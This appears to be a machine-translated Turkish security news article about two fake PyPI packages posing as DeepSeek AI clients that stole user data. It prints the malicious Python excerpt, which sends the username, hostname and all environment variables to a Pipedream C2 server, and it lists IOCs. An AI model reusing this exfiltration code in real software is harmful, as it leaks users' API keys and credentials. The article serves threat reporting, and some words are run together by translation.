Pozitif Teknolojiler Uzman Güvenlik Merkezi’nden (PT ESC) araştırmacılar, Python Paket Endeksinin (PYPI) kullanıcılarını hedefleyen kötü niyetli bir kampanyayı belirledi ve önledi.
Saldırıda iki sahte paket vardı deepseeek Ve deepseekaihassas kullanıcı ve sistem verilerini çalmak için tasarlanmıştır.
Bu paketler, AI ve makine öğrenimi teknolojilerine artan ilgiden yararlanmayı amaçlayan Deepseek AI API için meşru müşteriler olarak maskeleniyordu.
PYPI, Python paketleri için yaygın olarak kullanılan bir depodur ve popüler paket yöneticileri aracılığıyla erişilebilir pip– pipenvVe poetry.
Kötü niyetli paketler, metin oluşturma ve tamamlanma gibi işlevler sunan Deepseek AI hizmetleriyle etkileşim kurmak için gerçek araçlar olarak görünmek üzere hazırlanmıştır.
.webp)
Bununla birlikte, Pozitif Teknolojiler Uzman Güvenlik Merkezi (PT ESC), gerçek amaçlarının genellikle API anahtarları ve veritabanı kimlik bilgileri gibi kritik veriler içeren ortam değişkenleri de dahil olmak üzere hassas bilgileri toplamak ve iletmek olduğunu belirtmiştir.
Saldırı zinciri
Saldırı zinciri, kullanıcılar çalıştırdığında kötü niyetli bir yükün yürütülmesini içeriyordu. deepseeek veya deepseekai terminallerindeki komutlar.
Bu yük, kullanıcı ve sistem bilgilerini, iş akışlarını entegre etmek ve otomatikleştirmek için kullanılan bir platform olan PipedReam’de barındırılan bir komut ve kontrol (C2) sunucusuna göndermek için tasarlanmıştır.
Hassas verileri nasıl topladığını ve gönderdiğini vurgulayan kötü amaçlı koddan bir alıntı:-
import os
import requests
def send_get_request():
url = "https://eoyyiyqubj7mquj.m.pipedream.net"
try:
user_id = os.popen('whoami').read().strip()
hostname = os.uname().nodename
payload = {"user_id": user_id, "hostname": hostname, "env": os.environ}
response = requests.post(url, json=payload, verify=False)
except requests.exceptions.RequestException:
pass
def main():
send_get_request().webp)
Tespit edildikten sonra, PT ESC derhal PYPI yöneticilerini bilgilendirerek kötü amaçlı paketlerin kaldırılmasına yol açtı.
Swift eylemine rağmen, paketler kullanılarak toplam 36 kez indirildi pip ve bandersnatch yansıtma aracı ve tarayıcılar ve diğer araçlar aracılığıyla 186 kez.
İndirmeler, potansiyel bir küresel etkiyi gösteren birkaç ülkede kaydedildi.
.webp)
Siber suçlular genellikle kötü amaçlı yazılımları yaymak için eğilimleri ve popüler teknolojileri kullanırlar. Bu nedenle, kullanıcılar PYPI gibi depolardan paketler yüklerken dikkatli olmalı ve kurulumdan önce paketlerin gerçekliğini doğruladıklarından emin olmalıdır.
Bunun yanı sıra, geliştiricilerin ve kullanıcıların potansiyel tehditler hakkında bilgilendirilmeleri ve sistemlerini ve verilerini güvence altına almak için proaktif önlemler almaları çok önemlidir.
IOCS (Uzlaşma Göstergeleri)
- Paketler:
deepseeekVedeepseekai - C2 Sunucusu:
eoyyiyqubj7mquj.m.pipedream.net
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free